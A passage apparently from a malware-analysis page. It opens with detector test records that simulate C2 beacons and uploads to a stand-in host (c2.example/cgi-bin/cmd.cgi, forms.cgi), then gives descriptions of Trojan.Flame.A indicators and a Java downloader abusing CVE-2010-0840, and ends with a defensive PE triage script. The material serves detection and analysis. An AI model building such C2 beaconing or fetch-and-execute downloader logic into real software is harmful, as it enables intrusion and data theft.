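    ("10.0.0.5", "GET", "http://c2.example/cgi-bin/cmd.cgi?user_id=2806922672"
     "&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028"
     "&crc=00000000", None),
    ("10.0.0.5", "POST", "http://c2.example/cgi-bin/forms.cgi", "2806922672.2037028"),
    ("10.0.0.9", "GET", "http://intranet.example/cgi-bin/cmd.cgi?user_id=7", None),
    ("10.0.0.9", "POST", "http://intranet.example/cgi-bin/forms.cgi", "cv.pdf"),
]

print(infected_clients(RECORDS))
```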
  
       It creates events with restricted rights: access is denied for guest and anonymous users (D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
       Every action is executed by threads that are synchronized using critical sections or events.
       It uses a pipe for communication between threads (read/write).

Trojan.Flame.A

Spreading: medium
Damage: very high
Size: ~20MB
Discovered: 2012 May 28

SYMPTOMS:
Presence of the following files:
%windir%\system32\commgr32.dll
%windir%\system32\comspol32.dll
%windir%\system32\comspol32.ocx
%windir%\system32\indsvc32.dll
%windir%\system32\indsvc32.ocx
%windir%\system32\modevga.com
%windir%\system32\mssui.drv
%windir%\system32\scaud32.exe
%windir%\system32\sdclt32.exe
%windir%\system32\watchxb.sys
%windir%\system32\winconf32.ocx
Presence of this directory:
%COMMONPROGRAMFILES%\Microsoft Shared\MSSecurityMgr\
TECHNICAL DESCRIPTION:
This is multi-component malware for targeted attacks. It is able to spy, leak data, and download and execute other components.

Please let Bitdefender disinfect your files.
You can also download our removal tool:
http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/

New Virus Attack! Java Trojan Downloader

Java.Trojan.Downloader.OpenConnection.AI is a malicious Java applet that downloads and executes arbitrary files. In the wild, it can be found as a Java archive. The malicious HTML passes the encrypted URL of the file to download and execute as the parameter a to the applet. The applet uses the CVE-2010-0840 exploit to bypass the Java sandbox.
 
The JAR file contains four class files in the bpac package:
  • KAVS.class;
  • a$1.class;
  • a.class - the applet;
  • b.class - the URL decrypter.
The applet starts out by generating a random name for the executable under the system temporary directory. The name is made up entirely of random digits and has the extension ".exe" appended.
Next, it checks whether the operating system is Windows, by searching for the string Windows in the os.name system property.
If the OS checks out, the applet downloads the file and executes it with a call to Runtime#exec.
The code is somewhat obfuscated; for example, the names of the system properties java.io.tmpdir and os.name appear reversed.
 
We have observed two variants of the decrypter:
  1. One performs a series of single-character replacements on the URL, then appends the string "?i=1".
  2. The other one is a bit more complex: it assumes the URL isn’t encrypted at all, and duplicates some of the applet’s code. It downloads the file at the given URL, assumes it’s a PE executable and checks the Characteristics field of the IMAGE_FILE_HEADER for 0x2000, i.e., IMAGE_FILE_DLL.
    It generates a random name made up of digits for the executable, under the system temporary directory, and appends the proper extension, taking into account whether the file is a DLL or an EXE. If it’s an EXE, it executes it with a call to Runtime#exec, just like the applet does; if it’s a DLL, it registers it using regsvr32.
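
The same header check is useful when triaging files left in the temporary directory. This added example (not code from the malware or from the original write-up) reads the Characteristics field and notes whether the file name is made up entirely of digits; the function names are hypothetical and the PE images are constructed, header-only byte strings.

```python
import re
import struct

IMAGE_FILE_DLL = 0x2000
DIGITS_ONLY = re.compile(r"^\d+\.[A-Za-z0-9]+$")  # e.g. "4821907.exe"


def pe_characteristics(data):
    """Return IMAGE_FILE_HEADER.Characteristics, or None if data is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # The 4-byte "PE\0\0" signature is followed by the 20-byte IMAGE_FILE_HEADER;
    # Characteristics is its last field, at offset 18.
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (flags,) = struct.unpack_from("<H", data, e_lfanew + 4 + 18)
    return flags


def triage(name, data):
    """Classify a file found in the temp directory."""
    flags = pe_characteristics(data)
    if flags is None:
        return "not-pe"
    kind = "dll" if flags & IMAGE_FILE_DLL else "exe"
    return ("suspect-" if DIGITS_ONLY.match(name) else "") + kind


def fake_pe(characteristics):
    """Constructed header-only PE image for the example (no code inside)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    file_header = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0, characteristics)
    return dos + b"PE\0\0" + file_header


if __name__ == "__main__":
    # Constructed file names and images for illustration.
    for name, image in [("4821907.dll", fake_pe(0x2102)),
                        ("84512.exe", fake_pe(0x0102)),
                        ("setup.exe", fake_pe(0x0102)),
                        ("123.exe", b"MZ truncated")]:
        print(name, "->", triage(name, image))
```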